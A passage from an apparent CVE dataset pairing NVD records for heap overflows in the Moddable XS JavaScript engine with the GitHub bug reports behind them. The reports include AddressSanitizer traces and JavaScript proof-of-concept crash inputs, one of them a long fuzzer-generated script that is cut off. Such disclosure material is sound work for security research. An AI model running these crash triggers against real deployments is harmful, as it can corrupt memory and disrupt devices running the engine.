#240 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #241 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #242 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #243 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #244 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #245 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #246 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #247 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #248 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #249 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #250 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #251 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==5984==ABORTING ```
stack-overflow
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/586/comments
0
2021-02-26T10:34:42Z
2021-03-23T22:52:57Z
https://github.com/Moddable-OpenSource/moddable/issues/586
817,239,712
586
2,794
CVE-2021-29325
2021-11-19T17:15:08.113
OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fx_String_prototype_repeat function at /moddable/xs/sources/xsString.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/582" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/582" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Moddable-OpenSource/moddable/issues/582
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: cd /pathto/moddable/xs/makefiles/lin make test command: ./xst poc ``` # poc: ``` function getHiddenValue(){ var obj = {}; var oob = "/re/"; //oob = oob.replace("re","*".repeat(0x2000)); oob = oob.replace("re",oob = oob.replace("re","*".repeat(0x100000)).repeat(0x100000)); var str = 'class x extends Array{'+oob+"}"; var fun = eval(str); Object.assign(obj,fun); return obj; } function makeOobString(){ var hiddenValue = getHiddenValue(); var str = 'class x extends Array{}'; var fun = eval(str); Object.assign(fun,hiddenValue); var oobString = fun.toString(); return oobString; } var oobString = makeOobString(); ``` # description ``` ================================================================= ==5944==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f751f1fe820 at pc 0x7f75226c5904 bp 0x7fffc01aa870 sp 0x7fffc01aa018 WRITE of size 1048578 at 0x7f751f1fe820 thread T0 #0 0x7f75226c5903 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c903) #1 0x61c670 in fx_String_prototype_repeat /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsString.c:969 #2 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824 #3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708 #4 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369 #5 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270 #6 0x7f7521d6982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8) 0x7f751f1fe820 is located 0 bytes to the right of 16777248-byte region [0x7f751e1fe800,0x7f751f1fe820) allocated by thread T0 here: #0 0x7f75226d1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122 #2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377 #3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159 #4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305 #5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249 #6 0x7f7521d6982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0fef23e37cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fef23e37cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fef23e37cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fef23e37ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fef23e37cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fef23e37d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0fef23e37d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fef23e37d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fef23e37d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fef23e37d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fef23e37d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==5944==ABORTING ```
heap-buffer-overflow(fx_String_prototype_repeat)
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/582/comments
0
2021-02-26T10:30:19Z
2021-03-23T22:52:56Z
https://github.com/Moddable-OpenSource/moddable/issues/582
817,236,483
582
2,795
CVE-2021-29326
2021-11-19T17:15:08.157
OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fxIDToString function at /moddable/xs/sources/xsSymbol.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/583" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/583" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Moddable-OpenSource/moddable/issues/583
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: cd /pathto/moddable/xs/makefiles/lin make test command: ./xst poc ``` # poc: ``` var b2 = new Uint8Array(171); b2[0] = 0; b2[1] = 97; function makeOobString() { var hiddenValue = getHiddenValue(); var fun = eval(str); var str = '\'\''; var c = foo(/[\s\r\n]+/g).map(m, 'AAAA'); var fun = eval(str); var oobString = makeOobString(); var hiddenValue = getHiddenValue(); f(fun, hiddenValue); var oobString = WebAssembly.Module(); var fun = eval(str); return oobString; } b2[2] = 115; var i = 0; b2[3] = 109; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); function getHiddenValue() { var obj = {}; var oob = '(new Number(0))'; oob = 'valueOf'.repeat('re', JSON.parse(978)); var str = 'U*|m^c}d|#~^.g'; function foo(x) { MEM[array.length] *= 0; var o = a.map.call(p, test); } var fun = eval(str); var a = new Array(1, 2, 3); f(obj, fun); var ar = new Int8Array(c[0]); return obj; } b2[4] = 1; function getHiddenValue() { var MEM = new stdlib.Uint8Array(heap); var handler = { get: function (target, name) { if (name == '') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { var oobString = makeOobString(); return true; } }; var obj = {}; function getHiddenValue() { var obj = {}; var oob = '[\'z\']'; oob = oob.replace('re', ' \'use strict\' '.repeat(1048576)); var str = 'new Number(1)' + oob + 'enumberable'; var fun = eval(str); Object.assign(obj, fun); return obj; } var oobString = fun.toString(); var str = '-0'; var d = new Array(1, 2, 3); function getHiddenValue() { var ar = new Int8Array(c[0]); var obj = {}; var handler = { get: function (target, name) { if (name == '({valueOf:function(){return 0;}})') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { var oob = 'eval'; return true; } }; var oob = 'call'; oob = f('re', log(0.45603744997993667)); var str = 'caller'; function foo(x) { var oobString = makeOobString(); MEM[array.length] *= 0; var obj = {}; var m = parseInt(new Uint8Array(log(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); } var fun = eval(str); var oobString = fun.toString(); '00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(obj, fun); var m = ''.repeat(new Uint8Array(parseInt.customSections(v => parseInt(v, 16)))); return obj; } var oob = '(new String(\'\'))'; oob = Object('[]', eval(1048576)); function getHiddenValue() { var obj = {}; var oob = 'createIsHTMLDDA()'; oob = oob.replace('configurable', 'eval'.repeat(1048576)); var str = '{}' + oob + '({valueOf:function(){return 0;}})'; var fun = eval(str); Object.assign(obj, fun); return obj; } var o = a.map.call(p, test); var str = str; var str = ' /x/g '; var array = []; var d = new Array(1, 2, 3); var str = '<h3>'; var fun = eval(str); eval(obj, fun); var fun = eval(str); var a = new Array(1, 2, 3); function log() { var str = '<h3>'; for (var i = 0; KTta; i++) { str += arguments[i]; } str += '</h3>'; FMRc.call(/[\s\r\n]+/g).map(str); } var p = new Proxy([], handler); return obj; } var HJaX = Promise; var m = '00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(new Uint8Array(parseInt(v => parseInt(v, 16)))); function log() { var str = '1'; var oobString = fun.toString(); for (var i = 0; GXka; i++) { str += arguments[i]; } str += '</h3>'; function test() { return 131354989131639; } getHiddenValue(str); } b2[5] = 0; function test() { var oobString = fun.toString(); return 131354989131639; } b2[374] = 0; var hiddenValue = getHiddenValue(); b2[7] = 0; b2[0.6882051344744746] = 1; var hiddenValue = getHiddenValue(); var r = new RegExp(RegExp(' /x/g ')); var i = 0; b2[9] = 14; function makeOobString() { var hiddenValue = getHiddenValue(); var str = 'arguments.callee'; var o = a.map.call(p, test); var fun = eval(str); var fun = eval(str); var m = JSON.stringify(/[\s\r\n]+/g).map(new Uint8Array(print(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); var handler = { get: function (target, name) { if (name == 'length') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; var ar = new Int8Array(c[0]); Object(fun, hiddenValue); var oobString = eval(); return oobString; function getHiddenValue() { var obj = {}; var oob = '-Infinity'; oob = parseInt('({x:3})', Object(1048576)); var ar = new Int8Array(c[0]); var str = ' \'use strict\' '; function foo(x) { MEM[array.length] *= 0; } var o = a.map.call(p, test); var fun = eval(str); function log() { var str = '<h3>'; for (var i = 0; GXka; i++) { var oobString = fun.toString(); str += arguments[i]; function test() { return 131354989131639; } } str += 'arguments.callee'; var str = '{}' + oob + 'call'; f(str); } 'prototype'.repeat(obj, fun); return obj; } } var oobString = makeOobString(); var o = a.map.call(p, test); var fun = eval(str); var GXka = new Boolean(); var Wtwd = new Map([ [ 667, -9007199254740994, 443, 0.07347175385557603, -9007199254740992 ], [ -364, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 0.44760134769754445, 3037000498 ] ]); b2[10] = 3; var a = new Array(1, 0.045601841670223076, 0.10425251163056126); b2[11] = 96; b2[12] = 1; var str = '-Infinity'; b2[13] = 127; b2[14] = 0; b2[15] = 96; var i = 0; var array = []; b2[16] = 775; var hiddenValue = getHiddenValue(); var str = '<h3>'; b2[17] = 55; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 876, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); var str = 'new String(\'q\')'; b2[18] = 96; var obj = {}; var m = '*'.repeat(new Uint8Array(getHiddenValue(v => parseInt(v, 16)))); b2[19] = 2; b2[20] = 127; var c = fun.toString(m, 'arguments.callee'); b2[21] = 127; var oob = '/re/'; var oobString = makeOobString(); var p = new Proxy([], handler); b2[22] = 0.3450387102817629; var fun = eval(str); var str = '[0]'; var Wtwd = new Map([ [ 1073741823, -672, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); b2[23] = 833; b2[24] = 2; var fun = eval(str); var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -826, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); b2[25] = 35; function getHiddenValue() { var obj = {}; var p = new Proxy([], handler); var i = 0; function test() { return 131354989131639; } var oob = '{x:3}'; var a = new Array(1, 2, 3); function makeOobString() { var hiddenValue = getHiddenValue(); var str = 'function(){}'; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } oob = f('re', foo(/[\s\r\n]+/g).map(1048576)); var str = oob; function foo(x) { var fun = eval(str); MEM[array.length] *= 0; } var fun = eval(str); ''.repeat(obj, fun); var obj = {}; var handler = { get: function (target, name) { if (name == 'apply') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { var oob = 'eval'; return true; } }; var m = foo(/[\s\r\n]+/g).map(new Uint8Array(foo(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); var str = '{}' + oob + '}'; var p = new Proxy([], handler); return obj; } b2[26] = 2; var ar = new Int8Array(c[0.14427504137296565]); b2[0.21503255514884878] = 2; var fun = eval(str); b2[28] = 106; b2[0.25818522699508195] = 115; var obj = {}; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.2, -0.29683083976254676 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); var fun = eval(str); var m = f(new Uint8Array(WebAssembly.Module(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); var fun = eval(str); b2[30] = 3; function log() { var str = ''; var hiddenValue = getHiddenValue(); for (var i = 0; KTta; i++) { str += arguments[i]; } var oobString = fun.toString(); str += 'callee'; foo(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(str); } b2[934] = 0.13520367501571928; function getHiddenValue() { var obj = {}; var obj = {}; var oob = ''; var a = new Array(1, 2, 3); oob = log('*', log(/[\s\r\n]+/g).map(1048576)); var str = '<h3>'; var str = '/0/'; function getHiddenValue() { var obj = {}; var oob = 'valueOf'; oob = oob.replace('re', 'eval'.repeat(1048576)); var str = '{}' + oob + '}'; var fun = eval(str); Object.assign(obj, fun); return obj; } function foo(x) { MEM[array.length] *= 0; } var i = 0; var m = getHiddenValue(new Uint8Array(eval(v => parseInt(v, 161)))); var i = 0; var fun = eval(str); '*'.repeat(obj, fun); return obj; } b2[32] = 0.6597113836158741; b2[33] = 109; b2[34] = 0.06746787618936523; var i = 0; var array = []; b2[35] = 0; b2[36] = 1; var array = []; var str = ' /x/ ' + oob + ''; var ar = new Int8Array(c[0]); var str = '*'; b2[115] = 7; var c = parseInt(m, 'AAAA'); b2[38] = 105; b2[39] = 109; var fun = eval(str); var o = a.map.call(p, test); var str = '1'; function makeOobString() { var str = '+0' + oob + '}'; var hiddenValue = getHiddenValue(); var str = '({x:3})'; var fun = eval(str); function getHiddenValue() { var obj = {}; var oob = '({valueOf:function(){return 0;}})'; oob = oob.replace('re', '-Infinity'.repeat(1048576)); var str = 'v2' + oob + '__proto__'; var fun = eval(str); Object.assign(obj, fun); return obj; } var array = []; var oobString = fun.toString(); var r = new RegExp(RegExp('(new Number(0))')); getHiddenValue(fun, hiddenValue); var foo = function (stdlib, foreign, heap) { '1.23'; var MEM = new stdlib.Uint8Array(heap); function foo(x) { var i = 0; MEM[MEM[b2[63]]] *= 0; } return { foo: foo }; var obj = {}; }(this, {}, new ArrayBuffer(1)).foo; var str = 'null'; var oobString = foo(); return oobString; } b2[40] = 112; b2[41] = 111; var m = log(new Uint8Array(log(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); var oob = 'Infinity'; b2[42] = 114; var r = new RegExp(RegExp(' /x/ ')); b2[43] = 116; b2[44] = 115; var obj = {}; var c = xhCc.call(m, '({x:3})'); b2[45] = 13; var oobString = fun.toString(); var obj = {}; b2[46] = 105; var m = f(new Uint8Array(WebAssembly.Module(v => parseInt(v, 16)))); b2[47] = 109; b2[48] = 112; b2[49] = 111; var obj = {}; function getHiddenValue() { var obj = {}; var str = 'apply' + oob + '}'; var oob = '/re/'; var fun = eval(str); oob = print(' \'\\0\' ', eval(1048576)); var str = str; function getHiddenValue() { var obj = {}; var d = new Array(1, 2, 3); var oob = '[1]'; var handler = { get: function (target, name) { if (name == '[1]') { return 256; } var i = 0; var hiddenValue = getHiddenValue(); return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; var oob = 'eval'; oob = WebAssembly.Module('', 'valueOf'.repeat(1048576)); var str = ' \'use strict\' '; function log() { var str = '({valueOf:function(){return 0;}})'; var oobString = fun.toString(); for (var i = 0; GXka; i++) { str += arguments[i]; var i = 0; } str += '</h3>'; 'createIsHTMLDDA()'.repeat(str); } function foo(x) { MEM[array.length] *= 0; } var fun = eval(str); '00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(obj, fun); return obj; } var fun = eval(str); eval(obj, fun); var a = new Array(0.7509782354189012, 0.1974859854024249, 3); return obj; var o = a.map.call(p, test); function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } } var str = 'value' + ' \'A\' '; var m = WebAssembly.Module(/[\s\r\n]+/g).map(new Uint8Array(foo(v => parseInt(v, 16)))); var hiddenValue = getHiddenValue(); var oobString = makeOobString(); var oobString = makeOobString(); for (var ijjkkk = 0; GXka; ++ijjkkk) { var Wtwd = new Map([ [ 0.7796790656098118, -9007199254740994, 0.8206442487387069, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 0.8584196717738266, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); var DWXm = b2[18]; var i = 0; } var hiddenValue = getHiddenValue(); var c = '-0'.repeat(m, 'AAAA'); b2[50] = 114; var i = 0; function getHiddenValue() { var fun = eval(str); var obj = {}; var oobString = makeOobString(); var a = new Array(1, 2, 3); var oob = '\'\\0\''; var m = getHiddenValue(new Uint8Array('true'.repeat(v => parseInt(v, 16)))); var o = a.map.call(p, test); oob = print('1024', eval(1048576)); var oobString = makeOobString(); var str = str; var hiddenValue = getHiddenValue(); var fun = eval(str); var str = '+0' + oob + '}'; eval(obj, fun); return obj; } b2[229] = 116; b2[52] = 101; b2[53] = 100; var o = a.map.call(p, test); function getHiddenValue() { var obj = {}; var oob = '/0/'; oob = oob.replace('true', '/0/'.repeat(1048576)); var str = 'apply' + oob + '}'; var fun = eval(str); Object.assign(obj, fun); return obj; } var m = foo(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(new Uint8Array(' \'use strict\' '.split(v => parseInt(v, 97)))); var i = 0; var i = 0; var oob = '/re/'; b2[0.8673405704175872] = 95; var oobString = f(); function log() { var str = '<h3>'; for (var i = 0; KTta; i++) { str += arguments[i]; } str += 'nh8w?V-|Obj-Qk'; '*'.repeat(str); } var foo = function (stdlib, foreign, heap) { 'valueOf'; var MEM = new stdlib.Uint8Array(heap); var oobString = makeOobString(); function getHiddenValue() { var obj = {}; var oob = 'eval'; oob = oob.replace('get', 'valueOf'.repeat(1048576)); var str = '{x:3}' + oob + ''; var fun = eval(str); Object.assign(obj, fun); return obj; } function foo(x) { var fun = eval(str); var ar = new Int8Array(c[0]); MEM[MEM[b2[0.9599101550187807]]] *= 0.7851860562972905; } var p = new Proxy([], handler); var str = ' /x/g '; return { foo: foo }; }(this, {}, new ArrayBuffer(1)).foo; var c = WebAssembly.Module(m, 'AAAA'); b2[55] = 102; b2[56] = 117; function log() { var str = '({toString:function(){return \'0\';}})' + oob + '(new Number(0))'; var str = '<h3>'; for (var i = 0.3562617893262703; ijjkkk < 100000; i++) { function getHiddenValue() { var obj = {}; var oob = '[undefined]'; oob = oob.replace('re', 'get'.repeat(1048576)); var str = '{}' + oob + 'arguments'; var fun = eval(str); Object.assign(obj, fun); return obj; } var Wtwd = new Map([ [ 832, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 0.4727860951392562, 0.10379895794589467, 1e+400, 3037000498 ] ]); str += arguments[i]; var str = '{}' + oob + '}'; } str += '</h3>'; parseInt.customSections(str); } b2[57] = 110; var hkxa = b2[26]; var d = new Array(1, 2, 3); var oobString = fun.toString(); b2[58] = 99; b2[59] = 0; var i = 0; b2[60] = 0; var str = '({x:3})'; var ar = new Int8Array(c[0]); b2[61] = 3; b2[62] = 3; var fun = eval(str); function foo(x) { MEM[array.length] *= 0; } var i = 0; b2[63] = 2; var hiddenValue = getHiddenValue(); b2[64] = 1; function log() { var str = '(void 0)'; for (var i = 0; KTta; i++) { str += arguments[i]; } var str = ' /x/g '; str += '</h3>'; var oobString = makeOobString(); foo(str); } b2[65] = 2; var o = a.map.call(p, test); var fun = eval(str); var str = 'createIsHTMLDDA()'; var r = new RegExp(RegExp('\'\'')); function makeOobString() { var hiddenValue = getHiddenValue(); var str = '(new Boolean(false))'; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } b2[527] = 7; b2[449] = 30; b2[644] = 2; var oob = 'eval'; var m = print(new Uint8Array(''.repeat(v => parseInt(v, 16)))); function getHiddenValue() { var obj = {}; var oob = 'callee'; oob = oob.replace('re', 'eval'.repeat(1048576)); var str = '{}' + oob + 'set'; var fun = eval(str); Object.assign(obj, fun); return obj; } b2[69] = 13; var oobString = makeOobString(); b2[70] = 101; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 125, 1200, 1e+400, 3037000498 ] ]); var hiddenValue = getHiddenValue(); var oobString = makeOobString(); function log() { var str = ''; for (var i = 0; KTta; i++) { str += arguments[i]; } str += '</h3>'; DJkJ.call(/[\s\r\n]+/g).map(str); var p = new Proxy([], handler); } var fun = eval(str); var a = new Array(1, 2, 3); var fun = eval(str); b2[71] = 777; var a = new Array(1, 2, 3); var i = 0; b2[72] = 112; b2[73] = 111; var d = new Array(1, 2, 3); var kzcJ = MEM[MEM[b2[52]]]; var d = new Array(1, 2, 3); b2[74] = 114; function foo(x) { MEM[array.length] *= 0.7649781824601538; } function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } b2[75] = 116; var hiddenValue = getHiddenValue(); var oob = ''; var p = new Proxy([], handler); var str = '{}' + oob + 'Infinity'; var oobString = makeOobString(); b2[76] = 101; var o = a.map.call(p, test); var DJkJ = f(); var oobString = makeOobString(); function getHiddenValue() { var o = a.map.call(p, test); var obj = {}; var oob = '[]'; var handler = { get: function (target, name) { if (name == 'ざ') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; var hiddenValue = getHiddenValue(); oob = Object.assign('', f(377)); var str = 'value'; var str = 'valueOf'; function foo(x) { MEM[array.length] *= 0; } var obj = {}; var fun = eval(str); function log() { var str = '[0]'; for (var i = 0; KTta; i++) { str += arguments[i]; } var str = ' /x/g '; str += ''; parseInt(/[\s\r\n]+/g).map(str); var o = a.map.call(p, test); } var str = 'writable'; foo(obj, fun); return obj; } var oobString = fun.toString(); b2[305] = 100; var obj = {}; var str = ' /x/g '; var i = 0.4394732372222374; b2[78] = 934; b2[79] = 102; var oob = 'enumberable'; b2[80] = 117; var handler = { get: function (target, name) { if (name == 'length') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; var fun = eval(str); b2[81] = 110; b2[82] = 99; var Zxac = DWXm.call(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(1.3); var oob = 'length'; var c = Object(m, 'enumberable'); b2[83] = 0; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.8995786686958036, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 0.3957353019569745, 9007199254740994, 1200, 733, 3037000498 ] ]); var c = 'ざ'.repeat(m, 'AAAA'); b2[84] = 1; b2[85] = 0.39668982035420863; b2[86] = 97; var c = WebAssembly.Module(/[\s\r\n]+/g).map(m, 'AAAA'); b2[0.7977861306267542] = 99; var MEM = new stdlib.Uint8Array(heap); var obj = {}; for (var ijjkkk = 0; KTta; ++ijjkkk) { var a = new Array(1, 2, 3); var fun = eval(str); var GCdf = JSON; } b2[88] = 99; var fun = eval(str); b2[0.7735034424046705] = 0.6520197328936144; var ar = new Int8Array(c[0]); var i = 0; b2[328] = 109; var ar = new Int8Array(c[0]); b2[91] = 117; function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); 